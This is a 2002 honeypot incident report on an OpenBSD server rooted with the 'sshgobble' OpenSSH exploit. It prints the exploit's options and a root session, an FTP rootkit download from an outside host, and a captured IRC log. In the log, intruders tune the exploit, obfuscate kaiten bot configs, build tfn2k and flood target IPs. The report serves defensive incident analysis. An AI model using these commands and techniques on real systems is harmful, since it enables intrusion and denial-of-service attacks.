Our OpenBSD 3.0 honeypot was successfully hacked the 07. August 2002. Honeynet Project has captured some nice packets about this hack and this is the subject of the small report.
The exploit
Our openBSD 3.0 server was compromised using the first know exploit since about 6 year of OpenBSD history. The exploit is know under the name SSH GOBBLE. You’ll find a command line extract:
$ ./sshgobble GOBBLES SECURITY - WHITEHATS POSTING TO BUGTRAQ FOR FAME OpenSSH 2.9.9 - 3.3 remote challenge-response exploit #1 rule of ``ethical hacking'': drop dead Usage: sshgobble [options] host Options: ***** READ THE HOWTO FILE IN THE TARBALL ***** -l user Log in using this user name. -p port Connect to this port. Server must be on the same port. -M method Select the device (skey or bsdauth) default: bsdauth -S style If using bsdauth, select the style default: skey -d rep Test shellcode repeat default: 10000 (with -z) ; 0 (without -z) -j size Chunk size default: 4096 (1 page) -r rep Connect-back shellcode repeat default: 60 (not used with -z) -z Enable testing mode -v Verbose; display verbose debugging messages. Multiple -v increases verbosity. $ ./sshgobble -l root 192.168.200.146 [*] remote host supports ssh2 Warning: Permanently added '192.168.200.146' (RSA) to the list of known hosts. [*] server_user: root:skey [*] keyboard-interactive method available [*] chunk_size: 4096 tcode_rep: 0 scode_rep 60 [*] mode: exploitation *GOB uname -a;i OpenBSD openbsd 3.0 GENERIC#94 i386. uid=0(root) gid=0(wheel) groups=0(wheel). exit read(): Connection reset by peer $
Download some tools
After successfully compromising our OpenBSD honeypot our scripty kiddies downloaded a rootkit and connected from our server to efnet.demon.co.uk IRC server and started perfomring different tasks. Below the ftp connection:
cd /b ftp audiopimp.hypermart.net USER audiopimp PASS starfucker 230 User audiopimp logged in... SYS 215 UNIX Type: L8 get b.tg TYPE I 200 Type set to I.. SIZE b.tgz 213 16666 EPS 500 EPSV not understood.. Name (audiopimp.hypermart.net:root): EPSV not understood.. PAS 227 Entering Passive Mode (66,150,0,154,10,86)... RETR b.tgz 150 Opening BINARY mode data connection for b.tgz (16666 bytes)... 226 Transfer complete.. MDTM b.tgz qu MDTM b.tgz QUI Goodbye.
IRC client used
Thanks to Keith Bruss that pointed me to this information: Script kiddies installed the
kaiten.c
program. This is a IRC based distributed denial of service client. It connects to the server and accepts commands via the channel specified. More informations about the capabilities of this IRC client can be found here. This was used as a ddos tool but was killed by efnet.
IRC channel still active Fri Aug 23 11:36:29 CEST 2002
Thanks to Ace that pointed me to this information: The channel
#exo
is still around on efnet, I joined it to see if they were still there, and about 3 of their bots are left there:
#exo CHGLIZ H root@alh248008.alhsys.es (SHKVM) #exo CNQJ H root@alh248008.alhsys.es (QFGLO) #exo APCDIL H ~NATOJ@meggy.telerete.it (JEHE) #exo IZELCLG H ~QXGBMRYX@meggy.telerete.it (JWPSHYXU) #exo spubar H spubar@216.12.86.13 (SPUUUU!!) #exo bill H@ bill@elvis.mu.org (Bill Jonus)
Using bash and starting IRC chatting
When you log into an OpenBSD server you don’t have the confortable bash shell. So the first action the script kiddies performed was to start a bash from the downloaded binary and then started the IRC client:
./ls .cat.chgrp.chio.chmod.cp.cpio.csh.date.dd.df.domainname.echo.ed.eject.expr .hostname.kill.ksh.ln.ls.md5.mkdir.mt.mv.pax.ps.pwd.rcp.rksh.rm.rmail.rmd160 .rmdir.sh.sha1.sleep.stty.sync.tar.test. ./"bash /usr/libexec/ld.so: warning: libc.so.28.0: minor version expected, using it anyway efnet.demon.co.uk NOTICE QBOBGZM :*** Banned: ircing as root is bad (2001/10/0503.27).. ERROR :Closing Link: QBOBGZM[root@255.255.255.255] (Banned) PING :irc.secsup.uu.net. PONG :irc.secsup.uu.net
Enjoy the conversation
In this last section you can enjoy the conversation that took place on our hacked OpenBSD IRC server.
K1m!~K1m@most.wanted.terrori.st ::) K1m!~K1m@most.wanted.terrori.st :'.no Ronn|e!~Stargazer@stargazer.counterstrike.at :new one Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehe K1m!~K1m@most.wanted.terrori.st :hehe Ronn|e!~Stargazer@stargazer.counterstrike.at :lemme start it up K1m!~K1m@most.wanted.terrori.st :a fast one K1m!~K1m@most.wanted.terrori.st :did you ever test the net last night ? Ronn|e!~Stargazer@stargazer.counterstrike.at :ya ,tried it with that dude on cable, just using that 6* net Ronn|e!~Stargazer@stargazer.counterstrike.at :lol Ronn|e!~Stargazer@stargazer.counterstrike.at :coming now new one Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go ! Ronn|e!~Stargazer@stargazer.counterstrike.at :coming now new one ! Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go Ronn|e!~Stargazer@stargazer.counterstrike.at :siria ! Ronn|e!~Stargazer@stargazer.counterstrike.at :lol Ronn|e!~Stargazer@stargazer.counterstrike.at :wtf Ronn|e!~Stargazer@stargazer.counterstrike.at :hahahahaha K1m!~K1m@most.wanted.terrori.st :=) Ronn|e!~Stargazer@stargazer.counterstrike.at :there we go Ronn|e!~Stargazer@stargazer.counterstrike.at :there we gooooooooooo Ronn|e!~Stargazer@stargazer.counterstrike.at :bbb.se Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehee K1m!~K1m@most.wanted.terrori.st ::) Ronn|e!~Stargazer@stargazer.counterstrike.at :this was already scanned, but the bot was not running K1m!~K1m@most.wanted.terrori.st :reboot maybe Ronn|e!~Stargazer@stargazer.counterstrike.at :haha brutal K1m!~K1m@most.wanted.terrori.st :yes K1m!~K1m@most.wanted.terrori.st :=) K1m!~K1m@most.wanted.terrori.st :how do we get ops K1m!~K1m@most.wanted.terrori.st :from these K1m!~K1m@most.wanted.terrori.st :bots K1m!~K1m@most.wanted.terrori.st :| CZIHIV (~JGTA@217.71.230.58) K1m!~K1m@most.wanted.terrori.st :is nto working K1m!~K1m@most.wanted.terrori.st :its maybe a channel logger Ronn|e!~Stargazer@stargazer.counterstrike.at :lol K1m!~K1m@most.wanted.terrori.st :ban him ? K1m!~K1m@most.wanted.terrori.st :| CZIHIV (~JGTA@217.71.230.58)..: K1m!~K1m@most.wanted.terrori.st :| name : AHYPST..: K1m!~K1m@most.wanted.terrori.st :| chan : #exo..: K1m!~K1m@most.wanted.terrori.st :| serv : irc.mpls.ca K1m!~K1m@most.wanted.terrori.st :| idle : 3hrs 2mins 4secs (signed on Wed Aug 07 12:23:57 2002) Ronn|e!~Stargazer@stargazer.counterstrike.at :seems dead Ronn|e!~Stargazer@stargazer.counterstrike.at :hrm Ronn|e!~Stargazer@stargazer.counterstrike.at :maybe that client was simple dead, waiting for pinging out Ronn|e!~Stargazer@stargazer.counterstrike.at :let's check K1m!~K1m@most.wanted.terrori.st :i dont think so Ronn|e!~Stargazer@stargazer.counterstrike.at :well, let's keep the ban Ronn|e!~Stargazer@stargazer.counterstrike.at :will wait for mtrez to verify the stuff Ronn|e!~Stargazer@stargazer.counterstrike.at :im gonna change the source code of the kaiten bot K1m!~K1m@most.wanted.terrori.st ::) Ronn|e!~Stargazer@stargazer.counterstrike.at :so at least, the channel config, will be encripted Ronn|e!~Stargazer@stargazer.counterstrike.at :and such stuff K1m!~K1m@most.wanted.terrori.st :nice Ronn|e!~Stargazer@stargazer.counterstrike.at :it won't surprise me people joins here Ronn|e!~Stargazer@stargazer.counterstrike.at :lol K1m!~K1m@most.wanted.terrori.st :hehe K1m!~K1m@most.wanted.terrori.st :thats no good Ronn|e!~Stargazer@stargazer.counterstrike.at :getting a new one, with the buffer explit thingie or whtever is called, hopefully K1m!~K1m@most.wanted.terrori.st :ssh ? Ronn|e!~Stargazer@stargazer.counterstrike.at :that crap with the params Ronn|e!~Stargazer@stargazer.counterstrike.at :ya K1m!~K1m@most.wanted.terrori.st :ok Ronn|e!~Stargazer@stargazer.counterstrike.at :owned ! Ronn|e!~Stargazer@stargazer.counterstrike.at :[root@onview4 openssh-3.4p1]# ./ssh -l root 4.61.244.147 -M bsdauth -S skey -j 4096 -d 3050 Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] remote host supports ssh2 Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] server_user: root:skey..: Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] keyboard-interactive method available..: Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] chunk_size: 4096 tcode_rep: 3050 scode_rep 60 Ronn|e!~Stargazer@stargazer.counterstrike.at :[*] mode: exploitation Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOBBLE* Ronn|e!~Stargazer@stargazer.counterstrike.at :OpenBSD jupiter 3.0 GENERIC#94 i386 Ronn|e!~Stargazer@stargazer.counterstrike.at :uid=0(root) gid=0(wheel) groups=0(wheel) Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOOBLE* ! Ronn|e!~Stargazer@stargazer.counterstrike.at :hehehehe K1m!~K1m@most.wanted.terrori.st :lol K1m!~K1m@most.wanted.terrori.st :i have to learn thaat Ronn|e!~Stargazer@stargazer.counterstrike.at :i figured it out Ronn|e!~Stargazer@stargazer.counterstrike.at :though Ronn|e!~Stargazer@stargazer.counterstrike.at :the doc about that part sucks Ronn|e!~Stargazer@stargazer.counterstrike.at :you first try in test mode, til it stalls, not always work also Ronn|e!~Stargazer@stargazer.counterstrike.at :when you get the first stall value, then you try with -d Ronn|e!~Stargazer@stargazer.counterstrike.at :and find the value that doesn't make it hang, closest to the one to the one Ronn|e!~Stargazer@stargazer.counterstrike.at :that hangs Ronn|e!~Stargazer@stargazer.counterstrike.at :and such shit K1m!~K1m@most.wanted.terrori.st :=) Ronn|e!~Stargazer@stargazer.counterstrike.at :yat ! Ronn|e!~Stargazer@stargazer.counterstrike.at :yay ! K1m!~K1m@most.wanted.terrori.st :hmmm ? Ronn|e!~Stargazer@stargazer.counterstrike.at :you started it twice ? K1m!~K1m@most.wanted.terrori.st :i did`nt start it Ronn|e!~Stargazer@stargazer.counterstrike.at :coz sounds like the admin ran the bot twice, and then killed the service K1m!~K1m@most.wanted.terrori.st :i guess Ronn|e!~Stargazer@stargazer.counterstrike.at :i see K1m!~K1m@most.wanted.terrori.st :the same K1m!~K1m@most.wanted.terrori.st :hehe K1m!~K1m@most.wanted.terrori.st :lol K1m!~K1m@most.wanted.terrori.st :fuck K1m!~K1m@most.wanted.terrori.st :i bet he mailing that file K1m!~K1m@most.wanted.terrori.st :to some antivirus Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOBBLE* Ronn|e!~Stargazer@stargazer.counterstrike.at :OpenBSD www.perlcn.homeip.net 3.0 GENERIC#1 i386 Ronn|e!~Stargazer@stargazer.counterstrike.at :uid=0(root) gid=0(wheel) groups=0(wheel) Ronn|e!~Stargazer@stargazer.counterstrike.at :gooble !!! K1m!~K1m@most.wanted.terrori.st :=) Ronn|e!~Stargazer@stargazer.counterstrike.at :that gobble shit is funny K1m!~K1m@most.wanted.terrori.st :is it hard to get the channel stuff encryptet ? Ronn|e!~Stargazer@stargazer.counterstrike.at :oh nope Ronn|e!~Stargazer@stargazer.counterstrike.at :i mean, at least bascily K1m!~K1m@most.wanted.terrori.st :ok Ronn|e!~Stargazer@stargazer.counterstrike.at :encrypt each char with an xor, that's what id do hehe K1m!~K1m@most.wanted.terrori.st :ok K1m!~K1m@most.wanted.terrori.st :=) Ronn|e!~Stargazer@stargazer.counterstrike.at :at least is not in plain ascii on the binary K1m!~K1m@most.wanted.terrori.st :true K1m!~K1m@most.wanted.terrori.st :where is mtrez ? K1m!~K1m@most.wanted.terrori.st :asleep ? Ronn|e!~Stargazer@stargazer.counterstrike.at :prolly K1m!~K1m@most.wanted.terrori.st :oki K1m!~K1m@most.wanted.terrori.st :=) K1m!~K1m@most.wanted.terrori.st :shuld have the channel +i K1m!~K1m@most.wanted.terrori.st :and just somethimes K1m!~K1m@most.wanted.terrori.st :let the bots in Ronn|e!~Stargazer@stargazer.counterstrike.at :maybe jsut set up a relay bot Ronn|e!~Stargazer@stargazer.counterstrike.at :and idle in another channel K1m!~K1m@most.wanted.terrori.st :yes K1m!~K1m@most.wanted.terrori.st :=) Ronn|e!~Stargazer@stargazer.counterstrike.at :and send the commands from there K1m!~K1m@most.wanted.terrori.st :smart Ronn|e!~Stargazer@stargazer.counterstrike.at :hrm Ronn|e!~Stargazer@stargazer.counterstrike.at :hahahahaha Ronn|e!~Stargazer@stargazer.counterstrike.at :this one was funny Ronn|e!~Stargazer@stargazer.counterstrike.at :the box was owned Ronn|e!~Stargazer@stargazer.counterstrike.at :and the bot was started Ronn|e!~Stargazer@stargazer.counterstrike.at :but the admin, deleted the "bash " file K1m!~K1m@most.wanted.terrori.st :hehe Ronn|e!~Stargazer@stargazer.counterstrike.at :but forgot to kill the process K1m!~K1m@most.wanted.terrori.st :.o. K1m!~K1m@most.wanted.terrori.st :lol K1m!~K1m@most.wanted.terrori.st :dumb admin Ronn|e!~Stargazer@stargazer.counterstrike.at :okay i killed the wrong pid Ronn|e!~Stargazer@stargazer.counterstrike.at :lol * IRC msg loverbo pell deg av irc, din pedofaen Ronn|e!~Stargazer@stargazer.counterstrike.at :lololol K1m!~K1m@most.wanted.terrori.st :its a newbe K1m!~K1m@most.wanted.terrori.st :that tryes to get young girls Ronn|e!~Stargazer@stargazer.counterstrike.at :hehe K1m!~K1m@most.wanted.terrori.st :at my hometown channel K1m!~K1m@most.wanted.terrori.st :pedophile Ronn|e!~Stargazer@stargazer.counterstrike.at :ouch Ronn|e!~Stargazer@stargazer.counterstrike.at :*GOOBLE* again ! Ronn|e!~Stargazer@stargazer.counterstrike.at :hehe Ronn1e!ronnie@lostforever.org :seems an irc server crashed or some shit K1m!~K1m@most.wanted.terrori.st :yes Ronn1e!ronnie@lostforever.org :*GOBBLE* Ronn1e!ronnie@lostforever.org :*GOBBLE* Ronn1e!ronnie@lostforever.org :hahhaahha Ronn1e!ronnie@lostforever.org :this shit rule * pan 217.8.141.113 1234 10 K1m!~K1m@most.wanted.terrori.st :=) Ronn1e!ronnie@lostforever.org :wohaa Ronn1e!ronnie@lostforever.org :it came fucking fast K1m!~K1m@most.wanted.terrori.st :fuck K1m!~K1m@most.wanted.terrori.st :that was powerull K1m!~K1m@most.wanted.terrori.st :i felt it all over here Ronn1e!ronnie@lostforever.org :hahahaha K1m!~K1m@most.wanted.terrori.st :and i pinger another user K1m!~K1m@most.wanted.terrori.st :on my isp K1m!~K1m@most.wanted.terrori.st :my download K1m!~K1m@most.wanted.terrori.st :did drop down to 2 kbp K1m!~K1m@most.wanted.terrori.st :from 225 Ronn1e!ronnie@lostforever.org :lolololol Ronn1e!ronnie@lostforever.org :HAHAHAHAHA Ronn1e!ronnie@lostforever.org :that's brutal ! K1m!~K1m@most.wanted.terrori.st :for some secs K1m!~K1m@most.wanted.terrori.st :my ips have several 34 mbits K1m!~K1m@most.wanted.terrori.st :lines Ronn1e!ronnie@lostforever.org :*GOOBLE* !! Ronn1e!ronnie@lostforever.org :lol Ronn1e!ronnie@lostforever.org :K1m, do !eXo* instead of !* otherwise mtrez scanning bots packet people too. K1m!~K1m@most.wanted.terrori.st :ok K1m!~K1m@most.wanted.terrori.st ::) Ronn1e!ronnie@lostforever.org :i found out Ronn1e!ronnie@lostforever.org :the most vulnerable versions Ronn1e!ronnie@lostforever.org :i mena, easiest to root Ronn1e!ronnie@lostforever.org :are Ronn1e!ronnie@lostforever.org :3.02--->3.0---> Ronn1e!ronnie@lostforever.org :i found a lot on those three versions K1m!~K1m@most.wanted.terrori.st ::) K1m!~K1m@most.wanted.terrori.st :mrez K1m!~K1m@most.wanted.terrori.st :mtrez K1m!~K1m@most.wanted.terrori.st :shuld make a script K1m!~K1m@most.wanted.terrori.st :that did *!nick version K1m!~K1m@most.wanted.terrori.st :every time a bot joined K1m!~K1m@most.wanted.terrori.st :and if it not replyed K1m!~K1m@most.wanted.terrori.st :then +b Ronn1e!ronnie@lostforever.org :and scripted, should sort the bot nicks Ronn1e!ronnie@lostforever.org :lol Ronn1e!ronnie@lostforever.org :with privmsg or some shit Ronn1e!ronnie@lostforever.org :hahaahah Ronn1e!ronnie@lostforever.org :make channel order Ronn1e!ronnie@lostforever.org :lol Ronn1e!ronnie@lostforever.org :*GOBBLE* AGAIN ! Ronn1e!ronnie@lostforever.org :blub Ronn1e!ronnie@lostforever.org :hehehehe Ronn1e!ronnie@lostforever.org :sucks, it doesn't even have LS Ronn1e!ronnie@lostforever.org :this shell is fucked Ronn1e!ronnie@lostforever.org :GOOBLE AGAIN ! Ronn1e!ronnie@lostforever.org :hehehe Ronn1e!ronnie@lostforever.org :hey Ronn1e!ronnie@lostforever.org :sorted a new one Ronn1e!ronnie@lostforever.org :besides this one that just joined Ronn1e!ronnie@lostforever.org :and he is running eggdrops and stuff K1m!~K1m@most.wanted.terrori.st :lol K1m!~K1m@most.wanted.terrori.st :=) Ronn1e!ronnie@lostforever.org :byfrost 28077 0.0 2.3 1372 752 C0- SN 25Jun02 20:15.48 ./eggdrop egg Ronn1e!ronnie@lostforever.org :lo synth SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :OMFG SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION just died. SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION heart is ready to explode. SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :.ACTION trys to calm down. SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :heheh SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :not working fast enough for u? Ronn1e!ronnie@lostforever.org :it was replying to pings ! Ronn1e!ronnie@lostforever.org :no doesn't reply anymore Ronn1e!ronnie@lostforever.org :lol SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :heheh eXo-0* PAN 195.178.180.113 22 600 SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :he is untouchable Ronn1e!ronnie@lostforever.org :can't be Ronn1e!ronnie@lostforever.org :lol SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :ROFL SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :u can take just about anything out then SynthHELL!sinix@doesnt.care.about.your.personal-opinions.net :hahah K1m!~K1m@most.wanted.terrori.st :lol K1m!~K1m@most.wanted.terrori.st :=) Ronn1e!ronnie@lostforever.org :they got crazy K1m!~K1m@most.wanted.terrori.st :who ? Ronn1e!ronnie@lostforever.org :those bots Ronn1e!ronnie@lostforever.org :don't want to change nick Ronn1e!ronnie@lostforever.org :plus Ronn1e!ronnie@lostforever.org :eXo-03 Ronn1e!ronnie@lostforever.org :is on efnet Ronn1e!ronnie@lostforever.org :but not on this channel Ronn1e!ronnie@lostforever.org :lol K1m!~K1m@most.wanted.terrori.st :lagged K1m!~K1m@most.wanted.terrori.st :still Ronn1e!ronnie@lostforever.org :he has not figuredo ut how to join Ronn1e!ronnie@lostforever.org :ya Ronn1e!ronnie@lostforever.org :question Ronn1e!ronnie@lostforever.org :the Ronn1e!ronnie@lostforever.org :SSH-1.99-OpenSSH_3.1p1 Ronn1e!ronnie@lostforever.org :the p1 Ronn1e!ronnie@lostforever.org :what means ? patched maybe ? K1m!~K1m@most.wanted.terrori.st :not sure Ronn1e!ronnie@lostforever.org :i see, with those there's no luck apparently K1m!~K1m@most.wanted.terrori.st :did they restart the process Joar!~toxica@grendel.csc.smith.edu :hehe, du tar knekken p. hele gjengen jo :D Ronn1e!ronnie@lostforever.org :3.3 version is theorically explotaible ? Joar!~toxica@grendel.csc.smith.edu :OpenSSH? Ronn1e!ronnie@lostforever.org :ya Joar!~toxica@grendel.csc.smith.edu :I`ve seen people discussing it, but I dont know Ronn1e!ronnie@lostforever.org :i see eXo-96!~K1m@most.wanted.terrori.st :fuck Ronn1e!ronnie@lostforever.org :well, the how to says A vulnerable OpenSSH 2.9.9 - 3.3 sshd eXo-96!~K1m@most.wanted.terrori.st :that box was to fast Ronn1e!ronnie@lostforever.org :so not sure if those two versions are included or excluded eXo-96!~K1m@most.wanted.terrori.st :| idle : 36secs (signed on Fri Jul 12 18:15:49 2002) eXo-96!~K1m@most.wanted.terrori.st :it lagged Joar!~toxica@grendel.csc.smith.edu :mm eXo-96!~K1m@most.wanted.terrori.st :but did not die Ronn1e!ronnie@lostforever.org :some bots are very lagged Ronn1e!ronnie@lostforever.org :give it some secs more eXo-96!~K1m@most.wanted.terrori.st :i killed it Joar!~toxica@grendel.csc.smith.edu :hehe Joar!~toxica@grendel.csc.smith.edu :lurer p. hvor mange mbit som ble sendt avg.rde der HJKSHE!~K1m@most.wanted.terrori.st :ikke lite Ronn1e!ronnie@lostforever.org :*GOBBLE!* HJKSHE!~K1m@most.wanted.terrori.st :fuck HJKSHE!~K1m@most.wanted.terrori.st :some of them are laggggged MTrez!mtrez@theprojext.com :? HJKSHE!~K1m@most.wanted.terrori.st ::) MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :ehhe MTrez!mtrez@theprojext.com :carefull about crashing the bots MTrez!mtrez@theprojext.com :restarting all these is a pain in the arse MTrez!mtrez@theprojext.com :;p HJKSHE!~K1m@most.wanted.terrori.st :did not wrk MTrez!mtrez@theprojext.com :MSG MTrez!mtrez@theprojext.com :not msg MTrez!mtrez@theprojext.com :irc protocol is very specific * IRC MSG _b_ test MTrez!mtrez@theprojext.com :avoid ever doing that to a person unless you trust them though MTrez!mtrez@theprojext.com :wouldnt be too difficult to reroot all these boxes MTrez!mtrez@theprojext.com :heh HJKSHE!~K1m@most.wanted.terrori.st :i know HJKSHE!~K1m@most.wanted.terrori.st :uts my bot HJKSHE!~K1m@most.wanted.terrori.st :its my bot HJKSHE!~K1m@most.wanted.terrori.st :i just wanna see if it worked MTrez!mtrez@theprojext.com :you cant win em all ;) HJKSHE!~K1m@most.wanted.terrori.st :what if the ssh HJKSHE!~K1m@most.wanted.terrori.st :makes logs HJKSHE!~K1m@most.wanted.terrori.st :on those box`s MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :thats why ya gott be quick MTrez!mtrez@theprojext.com :i only log in and issue about 4-5 commands MTrez!mtrez@theprojext.com :then i log out MTrez!mtrez@theprojext.com :and im done HJKSHE!~K1m@most.wanted.terrori.st :do you know if it does ? MTrez!mtrez@theprojext.com :it might, depending on the system configuration HJKSHE!~K1m@most.wanted.terrori.st :ok HJKSHE!~K1m@most.wanted.terrori.st :did the nl die `? HJKSHE!~K1m@most.wanted.terrori.st :linux MTrez!mtrez@theprojext.com :i dont believe so MTrez!mtrez@theprojext.com :i dont believe so HJKSHE!~K1m@most.wanted.terrori.st :ok HJKSHE!~K1m@most.wanted.terrori.st PRIVMSG #t3st :sjekk Inion-awy!espen@213.151.138.8 PRIVMSG #t3st :fitte bra MTrez!mtrez@theprojext.com :JOIN * IRC part #t3st..: eXo-76!~BKTGDUTO@193.10.236.161 PART #t3st..: eXo-88!~XEDY@c-443572d5.017-51-7570701.cust.bredbandsbolaget.se PART #t3st MTrez!mtrez@theprojext.com :irc protocol requires uppercase commands MTrez!mtrez@theprojext.com :[11:35] <MTrez> do ya think i can get that obsd rk? :-/ MTrez!mtrez@theprojext.com :7> let me edit i MTrez!mtrez@theprojext.com :woot MTrez!mtrez@theprojext.com :we be gettin a obsd rk HJKSHE!~K1m@most.wanted.terrori.st :? MTrez!mtrez@theprojext.com :openbsd rootkit..: HJKSHE!~K1m@most.wanted.terrori.st :ok =) HJKSHE!~K1m@most.wanted.terrori.st :hehe HJKSHE!~K1m@most.wanted.terrori.st :nice MTrez!mtrez@theprojext.com :that guy coded one MTrez!mtrez@theprojext.com :thats the 3rd time ive begged him for it MTrez!mtrez@theprojext.com :bout time he gives it up MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :he shouldnt care about loosing some roots MTrez!mtrez@theprojext.com :he has like 500+ openbsd roots MTrez!mtrez@theprojext.com :heheh HJKSHE!~K1m@most.wanted.terrori.st :fuck HJKSHE!~K1m@most.wanted.terrori.st :=) HJKSHE!~K1m@most.wanted.terrori.st :thats alot MTrez!mtrez@theprojext.com :heh yeh MTrez!mtrez@theprojext.com :he said he couldnt get his version of kaiten to work on openbsd though MTrez!mtrez@theprojext.com :so i havent helped him out since he never gave me the rk ;p HJKSHE!~K1m@most.wanted.terrori.st :ok HJKSHE!~K1m@most.wanted.terrori.st :you think you can get it ? MTrez!mtrez@theprojext.com :likely yes MTrez!mtrez@theprojext.com :grr MTrez!mtrez@theprojext.com :i cant get tfn2k to compile on openbsd MTrez!mtrez@theprojext.com :pos HJKSHE!~K1m@most.wanted.terrori.st :not good MTrez!mtrez@theprojext.com :fixed it MTrez!mtrez@theprojext.com ::) HJKSHE!~K1m@most.wanted.terrori.st :=) MTrez!mtrez@theprojext.com :woot MTrez!mtrez@theprojext.com :tfn works MTrez!mtrez@theprojext.com :openbsd binaries completed for the client MTrez!mtrez@theprojext.com :server is available for linux HJKSHE!~K1m@most.wanted.terrori.st :=) MTrez!mtrez@theprojext.com :tfn2k also allows for smurfing MTrez!mtrez@theprojext.com :which can amplify our bandwidth 3 times or more MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :thats pretty nasty. HJKSHE!~K1m@most.wanted.terrori.st :smurfing no bo use HJKSHE!~K1m@most.wanted.terrori.st :any longer MTrez!mtrez@theprojext.com :my ASS MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :my friend still uses MTrez!mtrez@theprojext.com :it MTrez!mtrez@theprojext.com :its very very effective HJKSHE!~K1m@most.wanted.terrori.st :cus you cant find proper amplifiers MTrez!mtrez@theprojext.com :theres still tons HJKSHE!~K1m@most.wanted.terrori.st :any longer MTrez!mtrez@theprojext.com :there not very hard to find at all HJKSHE!~K1m@most.wanted.terrori.st :www.powertech.no HJKSHE!~K1m@most.wanted.terrori.st :scans HJKSHE!~K1m@most.wanted.terrori.st :for it HJKSHE!~K1m@most.wanted.terrori.st :and they report them HJKSHE!~K1m@most.wanted.terrori.st :afher what i heard HJKSHE!~K1m@most.wanted.terrori.st :smurf is useless HJKSHE!~K1m@most.wanted.terrori.st :but im no expert HJKSHE!~K1m@most.wanted.terrori.st :i had a scanner for bcasts HJKSHE!~K1m@most.wanted.terrori.st :once MTrez!mtrez@theprojext.com :gah MTrez!mtrez@theprojext.com :gotta wait till he gets off work MTrez!mtrez@theprojext.com :but once we get the rootkit MTrez!mtrez@theprojext.com :i think ill install tfn2k on all the boxes HJKSHE!~K1m@most.wanted.terrori.st :again MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :they must not have much bandwith, you rarely ever ping out HJKSHE!~K1m@most.wanted.terrori.st :i know MTrez!mtrez@theprojext.com :ehhe MTrez!mtrez@theprojext.com :now we wait for 40 bots to ping out MTrez!mtrez@theprojext.com :dont even think its effecting that shell MTrez!mtrez@theprojext.com :you should always test with a 10-15 sec ddos MTrez!mtrez@theprojext.com :to see if its worth it Ronn|e!ronnie@lostforever.org :ya Ronn|e!ronnie@lostforever.org :ya, true MTrez!mtrez@theprojext.com :dont even bother with anything on foonet.net MTrez!mtrez@theprojext.com :thats INSANE bandwidth MTrez!mtrez@theprojext.com :and heavily filtered Ronn|e!ronnie@lostforever.org :i see MTrez!mtrez@theprojext.com :requires gigabit ddosnets MTrez!mtrez@theprojext.com ::-/ Ronn|e!ronnie@lostforever.org :boooom MTrez!mtrez@theprojext.com :i was thinking of getting a foonet.net colocation MTrez!mtrez@theprojext.com :its insanely stable MTrez!mtrez@theprojext.com :they dont even charge for down bandwidth MTrez!mtrez@theprojext.com :so you can get ddosed MTrez!mtrez@theprojext.com :and never get charged MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :not to mention their core router filters all kinda attacks HJKSHE!~K1m@most.wanted.terrori.st :www.foonet.net = lagged HJKSHE!~K1m@most.wanted.terrori.st :as hell MTrez!mtrez@theprojext.com :heh, they get lagged slightly cause of the traffic they handle MTrez!mtrez@theprojext.com :but overall they can have decent latency MTrez!mtrez@theprojext.com :its just the major shell providers on their network that are lagged HJKSHE!~K1m@most.wanted.terrori.st :now its up again MTrez!mtrez@theprojext.com :someday we'll have enough bandwidth to take out foonet.net MTrez!mtrez@theprojext.com :;p HJKSHE!~K1m@most.wanted.terrori.st :is it only the bots with bad conection that pings out ? MTrez!mtrez@theprojext.com :well, sorta MTrez!mtrez@theprojext.com :hehe MTrez!mtrez@theprojext.com :its just the ones that max out their bandwidth Ronn|e!ronnie@lostforever.org : 21 packets transmitted, 5 packets received, 76% packet loss..: Ronn|e!ronnie@lostforever.org :hey mtrez, was kinda affecting it..: Ronn|e!ronnie@lostforever.org :lol Ronn|e!ronnie@lostforever.org :that's brutal MTrez!mtrez@theprojext.com :hehe yah MTrez!mtrez@theprojext.com :for foonet.net..: YLCLS!~TGLWLMRM@meggy.telerete.it JOIN :#exo MTrez!mtrez@theprojext.com :thats insane MTrez!mtrez@theprojext.com :i know friends with tons of bandwidth that cant really take out foonet.net either MTrez!mtrez@theprojext.com :they can take out irc servers but not foonet MTrez!mtrez@theprojext.com :heheh HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st :btw HJKSHE!~K1m@most.wanted.terrori.st :what is watchdog MTrez!mtrez@theprojext.com :a hack monitor MTrez!mtrez@theprojext.com :heh HJKSHE!~K1m@most.wanted.terrori.st :lol HJKSHE!~K1m@most.wanted.terrori.st :fuck HJKSHE!~K1m@most.wanted.terrori.st :uninstall it MTrez!mtrez@theprojext.com :heh MTrez!mtrez@theprojext.com :i think the admin would notice if i did MTrez!mtrez@theprojext.com :just hope it doesnt have the latest updates MTrez!mtrez@theprojext.com :;p HJKSHE!~K1m@most.wanted.terrori.st :i can do 10 mbit HJKSHE!~K1m@most.wanted.terrori.st :ougoing HJKSHE!~K1m@most.wanted.terrori.st :with a kaiten HJKSHE!~K1m@most.wanted.terrori.st :on my box MTrez!mtrez@theprojext.com :lol HJKSHE!~K1m@most.wanted.terrori.st :and only 2 mbit HJKSHE!~K1m@most.wanted.terrori.st 